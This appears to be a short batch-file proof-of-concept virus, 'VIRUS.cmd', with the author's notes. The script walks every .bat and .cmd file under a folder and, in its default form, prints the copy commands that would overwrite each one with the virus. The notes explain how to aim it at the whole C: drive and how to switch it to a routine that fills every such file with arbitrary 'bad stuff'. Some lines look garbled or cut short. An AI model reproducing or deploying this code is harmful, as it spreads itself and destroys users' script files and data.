---Start of file VIRUS.cmd---
{at}echo off
set source=%~f0
set target=C:\Temp
for /r %target% %%d in (*.bat *.cmd) do call :whacker %%~fd goto :eof
:whacker
ECHO copy %source% "%*"
goto :eof
:whacker2
echo rem This is the first BAD LINE>%1 echo rem This is the second BAD

---End of file---
This works on all *.bat and *.cmd files under the target folder. If you set
target=C:\ it will do all of C: drive (not tested:-).
It ECHOes the required copy statements that (if executed) would replace
every *.bat and *.cmd file with a copy of the virus.
If you change 'call :whacker' to 'call :whacker2', the PoC will replace
every *.bat and *.cmd file with whatever bad stuff you want.
